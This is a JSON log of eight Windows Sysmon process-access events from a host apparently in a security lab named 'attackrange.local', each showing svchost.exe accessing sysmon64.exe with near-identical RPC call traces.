{"EventTime":"2020-08-01 05:48:40","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3059,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:40.777\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:40.777","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:40","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3060,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:40.777\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:40.777","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:40","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3061,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:40.777\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:40.777","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:40","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3062,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:40.777\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:40.777","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:40","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3063,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:40.777\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:40.777","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:40","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3064,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:40.777\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:40.777","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:40","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3065,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:40.777\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:40.777","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:40","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3066,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:40.777\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:40.777","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
